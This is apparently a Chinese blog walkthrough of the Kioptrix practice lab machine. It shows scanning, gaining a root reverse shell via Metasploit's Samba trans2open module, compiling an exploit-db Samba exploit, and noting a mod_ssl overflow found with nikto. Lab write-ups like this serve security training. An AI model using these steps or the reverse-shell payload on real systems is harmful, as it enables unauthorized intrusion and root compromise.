靶机地址:172.16.1.193

Kali地址:172.16.1.107

 

首页为Apache测试页,没看到有价值信息

 kioptrix靶机记录

尝试目录扫描:

 kioptrix靶机记录

 

 

点击查看:

http://172.16.1.193/index.html

  http://172.16.1.193/manual/

    http://172.16.1.193/manual/mod/mod_ssl/

User manual  mod_ssl version 2.8

 

http://172.16.1.193/usage/

  Webalizer

http://172.16.1.193/mrtg/                                                     

好吧,我还是不要在web上执迷不悟了,端口扫描看看。

 kioptrix靶机记录

 

 

发现了139端口,sambaKalimsf尝试攻击

 kioptrix靶机记录

 

 

使用第11个,exploit/linux/samba/trans2open,设置目标ip为靶机地址

 kioptrix靶机记录

 

 

show payloads 查看可使用的载荷

 kioptrix靶机记录

 

 

选择反弹shell的方式,set payload linux/x86/shell/reverse_tcp,运行

 kioptrix靶机记录

 

 

expolit得到反弹shell

 kioptrix靶机记录

 

 

权限为root,完成

 

漏洞利用方法二:

Kali搜索

 kioptrix靶机记录

 

  

使用/usr/share/exploitdb/exploits/multiple/remote/10.c,复制出来,使用gcc编译

 kioptrix靶机记录

 

 

查看并设置参数执行。获取root权限

 kioptrix靶机记录

 

完成。

 

注:

  网上还有其他方法

使用Apache OpenSSL溢出漏洞利用

使用nikto扫描

  命令nikto -h 172.16.1.193 -o result.html

kioptrix靶机记录

 

 

发现可用信息:

 mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

 

Kali搜索Apache OpenSSL,选择利用

kioptrix靶机记录

 

 。。。该方法也能拿到root权限。

相关文章:

  • 2021-08-13
  • 2021-07-28
  • 2021-07-29
  • 2021-07-30
  • 2021-08-03
  • 2021-08-04
  • 2021-08-05
  • 2021-10-13
猜你喜欢
  • 2021-04-21
  • 2021-09-05
  • 2022-02-07
  • 2021-08-12
  • 2022-02-28
  • 2021-05-12
  • 2021-05-23
相关资源
相似解决方案